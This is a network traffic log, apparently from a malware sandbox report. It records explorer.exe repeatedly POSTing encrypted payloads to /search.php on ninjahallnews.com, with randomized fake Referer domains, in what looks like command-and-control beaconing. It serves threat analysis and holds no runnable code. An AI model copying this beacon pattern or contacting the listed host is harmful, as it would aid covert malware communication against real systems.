                                                                                                                          2024-10-08 16:24:22 UTC286OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6b 34 01 83 b7 25 93 3c 62 cd 1f 83 dd fa 0a 5c ac 70 13 a5 73 8e ee 7d 15 a8 78 4a 7c c5 cb e3 5a ac f7 18 73 f9 b2 7e a9 45 27 fb ea 79 1d 6a 63 3d 4f c7 0f 91 f9 b2 3b d1 b8 4a 25 5a ed 70 06 c3 32 44 f1 9a 83 d4 5e 03 8a 6a d2 5b ea 22 20 a9 44 a4 4a 40 2c 1b 53 f5 f6 03 e9 cc 67 e4 38 2e 9b e5 c6 54 dd e1 44 ba c1 ad de 53 69 9c c3 bf 40 06 94 6f 13 eb 6d 0a 5e e6 4c 7d 5b d3 47 31 5c 84 87 ea 17 31 d1 eb 62 aa 6e df fa bf 12 1a 7d 46 db 02 20 71 23 16 e3 0f ec b8 0b 1e 6c 7d 43 e0 ef 57 7a 41 40 d6 f4 d2 5d d7 e8 6e e7 2f be bb be 9b 4b cb 58
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lk4%<b\ps}xJ|Zs~E'yjc=O;J%Zp2D^j[" DJ@,Sg8.TDSi@om^L}[G1\1bn}F q#l}CWzA@]n/KX
                                                                                                                          2024-10-08 16:24:22 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:22 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.66143623.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:23 UTC288OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://xmqdemcyeborscy.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 114
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:23 UTC114OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 68 34 01 83 b7 25 93 3c 28 a7 7a 94 b6 a0 45 25 b9 73 79 f6 31 92 8d 7f 10 b7 3e 0f 61 91 b4 ef 52 e4 ed 6b 54 99 a0 22 eb 5b 4a cb
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lh4%<(zE%sy1>aRkT"[J
                                                                                                                          2024-10-08 16:24:23 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:23 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.66143723.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:24 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ivdqbkwbkfcqmd.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 281
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:24 UTC281OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 69 34 01 83 b7 25 93 3c 5f aa 1a e7 98 a4 1f 31 ad 6d 2d a3 51 d4 c8 65 65 fe 07 2c 24 d7 e9 db 38 eb c7 02 03 9f 8f 58 af 75 56 8b 84 6b 32 38 5f 40 51 ee 34 d0 91 84 3d ff 99 2c 3a 03 fc 63 3f b7 2b 53 8b d8 ad 9f 5c 35 ca 13 dc 35 af 1a 45 94 45 c3 28 6c 4d 72 65 fb ed 19 fc af 24 f8 34 11 c6 e2 85 1b ad 91 75 f5 99 89 87 58 4f c8 b5 aa 4c 3e 81 73 3e fb 11 60 3f fb 7d 32 7f fc 3b 13 0b f9 da 8a 7c 26 d1 b2 78 a9 59 8e a3 e7 3c 73 03 75 f2 1f 11 1c 47 0e e3 1e 90 a6 1c 20 6b 65 35 c7 f1 32 2f 49 17 cd 93 9f 1a 89 c9 65 db 5a a3 ba b4 d9 59 cd 2b
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Li4%<_1m-Qee,$8XuVk28_@Q4=,:c?+S\55EE(lMre$4uXOL>s>`?}2;|&xY<suG ke52/IeZY+
                                                                                                                          2024-10-08 16:24:24 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:24 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.66143823.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:25 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://kygmejbuqfed.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 209
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:25 UTC209OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6e 34 01 83 b7 25 93 3c 26 f1 6e 82 de fc 30 1d e6 36 61 e0 28 90 f1 1d 14 fd 0c 08 74 c4 b6 82 6d ee f4 67 76 e9 a1 4c af 33 26 ab de 01 29 76 44 4b 01 e6 2a 9e f4 bc 07 e6 fd 64 12 0b 99 73 36 d5 47 56 e7 93 ea b9 58 08 de 10 a2 6d 9b 66 59 d1 39 81 6d 6c 28 7e 69 a2 f1 19 98 91 27 84 44 76 d0 d0 ae 59 ed a4 74 b9 df ff 97 02 6c d3 ae 91 1c 2e a4 6c 4b da 03 48 30 a0 6f 11 49 dd 51 09 4e df ba fd 33 2c ac ed 40
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Ln4%<&n06a(tmgvL3&)vDK*ds6GVXmfY9ml(~i'DvYtl.lKH0oIQN3,@
                                                                                                                          2024-10-08 16:24:26 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:25 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          7192.168.2.66143923.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:27 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://oearusgjpsibxo.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 366
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:27 UTC366OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6f 34 01 83 b7 25 93 3c 46 ae 12 fb bd a1 26 14 a8 08 3c bd 3e c7 f1 3f 61 fd 2b 05 73 c4 e4 f0 23 b3 cd 66 1c fa ff 20 8d 4c 47 be 86 56 64 73 7a 03 5a c3 7f de e5 d3 50 ce fc 29 23 52 f0 7e 5e bc 41 6d c8 d5 99 9f 45 0d d7 45 f5 35 88 0f 5a ba 06 d7 33 47 4b 12 66 ca a9 0e a3 87 10 f9 37 69 f5 b4 85 52 aa 94 7b eb cb ac 8f 46 75 82 d6 97 02 35 a7 04 28 d5 7b 5a 0b a3 69 2e 5b bd 5c 17 57 f1 97 8e 1d 55 cd f7 68 f5 38 97 fa d2 63 6e 07 39 a0 6b 61 5d 20 00 c0 17 e8 92 73 58 2d 73 3b f6 9e 5b 49 2b 39 bc 84 da 3e d6 d6 32 82 2c b8 bb bb b3 02 aa 2d
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lo4%<F&<>?a+s#f LGVdszZP)#R~^AmEE5Z3GKf7iR{Fu5({Zi.[\WUh8cn9ka] sX-s;[I+9>2,-
                                                                                                                          2024-10-08 16:24:27 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:27 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          8192.168.2.66144023.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:27 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://bkkawsblriievtha.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 256
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:28 UTC256OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6c 34 01 83 b7 25 93 3c 7f e4 1a b8 8b c9 00 17 d3 18 75 e8 63 c5 db 36 74 ab 79 38 27 c6 b8 f7 4a bd df 07 10 d2 f7 77 87 50 7b ee d2 19 2c 7f 47 1c 51 ec 14 8d 81 bb 5e 96 f9 6f 62 02 93 05 51 f6 49 00 82 ff e0 cf 02 19 cf 5d a4 23 97 38 7e b4 00 9b 78 51 2a 14 47 ad f9 64 fd 8f 10 ef 14 2c f5 dd d0 5f ae b9 62 e5 ba ea af 4e 6c cf 83 d2 62 2a b1 5d 1e d9 2a 7b 24 81 2c 70 5a f2 35 32 22 e0 d9 99 2e 55 d0 c7 72 94 79 c8 a3 e2 03 02 20 4b c5 77 09 19 15 1c a7 25 f2 a5 0a 53 21 57 06 ec 8c 4f 2b 29 4f af 8d f4 1c f2 d2 71 e1 49 c4 8c a7 9b 5c a0 23
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Ll4%<uc6ty8'JwP{,GQ^obQI]#8~xQ*Gd,_bNlb*]*{$,pZ52".Ury Kw%S!WO+)OqI\#
                                                                                                                          2024-10-08 16:24:28 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:28 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.66144123.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:28 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://cdxudjgvudlubb.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 112
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:28 UTC112OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 6d 34 01 83 b7 25 93 3c 3d ac 6a 8e a2 c8 2c 09 f1 03 3b 9c 5b d5 e4 0f 37 b2 69 2b 7d ca f8 e1 73 e1 dc 6a 50 f2 84 41 95 03
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lm4%<=j,;[7i+}sjPA
                                                                                                                          2024-10-08 16:24:29 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:29 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.66144223.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:29 UTC289OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://mdlgxwobmimrfsiq.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 139
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:29 UTC139OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 62 34 01 83 b7 25 93 3c 7f c2 79 b3 aa d9 16 59 d0 7b 1b a1 7f c4 d5 14 19 f6 31 53 3b a7 b5 e3 2c ae e8 50 1e 80 ed 78 a3 4a 7b 91 e7 5e 09 38 19 57 3f e2 6f b3 c2 96 34 91 fe 53 2e 53 8d 74 2a b0 7e 6f ae
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lb4%<yY{1S;,PxJ{^8W?o4S.St*~o
                                                                                                                          2024-10-08 16:24:30 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:29 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.66144323.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:30 UTC285OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://kdihkbbguxoo.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 264
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:30 UTC264OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 63 34 01 83 b7 25 93 3c 5b b3 74 84 a4 ce 55 51 f1 7d 07 b4 35 cb f2 0a 32 c0 39 25 4f d0 cc c3 65 ad ea 51 79 d6 fb 36 83 55 7b 81 c0 0a 36 64 60 17 44 fb 3c c5 e8 84 32 85 b2 57 79 5e 82 5c 35 bd 6e 6e 86 d7 a5 c8 3f 03 bf 57 bc 23 bf 37 65 ad 4b c3 56 65 63 2d 5b e6 e3 79 8e c2 16 f3 2e 70 8b f2 b5 28 a2 91 5e 95 d7 fa c6 5d 3a bf 87 99 07 34 8f 61 3c ff 7b 7a 33 bc 32 22 63 c3 40 3e 5d ec 90 f1 7e 59 a8 c3 21 e6 2d c5 a8 d7 7e 3c 7e 75 d4 5f 2b 5d 4f 75 b9 1c a7 be 7e 13 04 3a 2d 9e a6 42 50 2a 3d a6 f8 f0 34 d1 b1 29 e0 63 db eb ca 83 44 db 2c
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lc4%<[tUQ}529%OeQy6U{6d`D<2Wy^\5nn?W#7eKVec-[y.p(^]:4a<{z32"c@>]~Y!-~<~u_+]Ou~:-BP*=4)cD,
                                                                                                                          2024-10-08 16:24:30 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:30 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.66144423.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:31 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://kwisrrqgrmlvi.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 176
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:31 UTC176OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 60 34 01 83 b7 25 93 3c 46 ca 69 8e 81 ba 13 06 ec 1d 3b e9 44 ca 98 6c 0a b4 6f 37 61 a5 de 91 21 f3 b6 03 19 9f a0 20 b8 3d 55 8c d1 0c 13 6b 10 21 0a c1 67 9b 9d d3 5f 92 bc 53 6c 32 b0 5f 48 d3 67 16 9e c0 ed db 31 1f d2 5a b9 33 8c 7f 53 cc 36 9d 52 75 7b 0a 74 a6 f4 68 93 a9 6e d3 17 64 d8 fa 97 2f d7 e0 1a d9
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@L`4%<Fi;Dlo7a! =Uk!g_Sl2_Hg1Z3S6Ru{thnd/
                                                                                                                          2024-10-08 16:24:32 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:32 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.66144523.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:32 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://ntbrsmlnvptwiq.net/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 262
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:32 UTC262OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 61 34 01 83 b7 25 93 3c 5e d9 37 fd 97 a0 25 55 ce 1f 3b 88 6a c8 97 06 37 be 74 2d 7b a0 a4 e9 77 cc a9 7c 53 db 97 56 89 3f 44 82 8c 11 3f 74 47 49 24 8e 7d d6 81 cf 1d fe 8c 3f 11 46 f9 6b 49 e7 48 0a f6 8f f6 ac 55 3a 8c 74 b5 7d f6 7c 4b 9a 4e 8c 45 7b 22 07 74 e6 d3 17 b4 8d 6a 96 47 1b 96 d4 bc 2b cb ff 10 b7 b8 a1 9c 57 46 b4 81 c9 60 37 d7 42 3c ef 38 72 53 e5 2e 12 77 f2 18 36 4f de d2 9e 15 78 96 cd 78 eb 5e c2 c7 a5 12 60 28 6a f7 6b 68 4e 39 0b bd 21 fd b7 79 23 00 33 08 9a fb 42 39 07 36 b6 e5 8f 16 e6 aa 28 db 5b b5 bd ae de 07 d2 50
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@La4%<^7%U;j7t-{w|SV?D?tGI$}?FkIHU:t}|KNE{"tjG+WF`7B<8rS.w6Oxx^`(jkhN9!y#3B96([P
                                                                                                                          2024-10-08 16:24:33 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:32 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.66144623.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:33 UTC287OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://iymhwcsxyfccua.com/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 344
                                                                                                                          Host: ninjahallnews.com
                                                                                                                          2024-10-08 16:24:33 UTC344OUTData Raw: 72 19 85 c8 8d 79 60 88 69 f7 e0 65 32 f1 61 27 d0 80 c2 d0 10 0b 43 f8 03 7c c7 e1 9c a2 47 e3 7c 9b b8 f5 00 f1 a2 f5 f3 0a d0 c0 e8 29 25 bc ad d4 27 64 00 63 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 40 4c 66 34 01 83 b7 25 93 3c 37 f7 0b ee d4 f6 16 3d f7 02 31 8b 5e e2 9f 17 2a df 70 05 4b b9 bc 8f 3a df ea 41 72 fe a1 53 86 4c 5e f9 e9 04 71 22 4f 15 48 e9 05 df 8e b9 2f 8e a8 23 14 4d e6 17 24 f2 22 15 fd ec 96 c5 3e 08 bc 7e d9 2a b3 7a 31 bd 57 9f 7b 20 33 7e 58 eb fb 0b a2 99 6b 89 1c 33 f5 b3 d2 0a d4 fe 0b f8 99 fa b9 2c 5d d1 c5 be 15 0b a9 4e 36 d8 70 14 32 8e 68 75 78 d2 31 04 51 f3 92 d8 0e 52 af a9 00 e3 34 dd c2 c9 72 23 22 2b cc 0e 3d 18 39 30 c8 3f e7 b7 7a 3a 65 76 54 9a bd 36 20 28 52 c6 f6 f3 2f de fc 3e fb 27 81 fb b5 95 0d 8e 62
                                                                                                                          Data Ascii: ry`ie2a'C|G|)%'dcg3iqH[@Lf4%<7=1^*pK:ArSL^q"OH/#M$">~*z1W{ 3~Xk3,]N6p2hux1QR4r#"+=90?z:evT6 (R/>'b
                                                                                                                          2024-10-08 16:24:34 UTC278INHTTP/1.1 200 OK
                                                                                                                          Date: Tue, 08 Oct 2024 16:24:33 GMT
                                                                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          X-Frame-Options: DENY
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Content-Length: 0
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Connection: close


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.66144723.145.40.1684434004C:\Windows\explorer.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-08 16:24:35 UTC286OUTPOST /search.php HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Accept: */*
                                                                                                                          Referer: https://pyvpiskjnabcb.org/
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                          Content-Length: 310
                                                                                                                          Host: ninjahallnews.com
